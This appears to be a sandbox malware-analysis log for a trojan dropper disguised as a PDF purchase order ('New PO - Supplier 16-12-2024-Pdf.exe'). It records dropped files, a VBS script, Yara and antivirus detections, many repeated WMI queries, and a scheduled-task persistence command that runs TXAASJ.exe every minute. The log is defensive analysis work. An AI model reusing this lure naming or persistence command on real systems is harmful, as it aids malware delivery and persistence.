                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName!l vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@21/50@9/4
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9D712 GetLastError,FormatMessageW,9_2_00E9D712
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8B8B0 AdjustTokenPrivileges,CloseHandle,9_2_00E8B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00E8BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,9_2_00E9EA85
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,9_2_00E96F5B
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EAC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,9_2_00EAC604
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E531F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,9_2_00E531F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4508
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                              Source: Yara matchFile source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: New PO - Supplier 16-12-2024-Pdf.exe Virustotal: Detection: 80%
                              Source: New PO - Supplier 16-12-2024-Pdf.exe ReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File read: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                              Source: unknown Process created: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe"
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: textshaping.dllJump to behavior
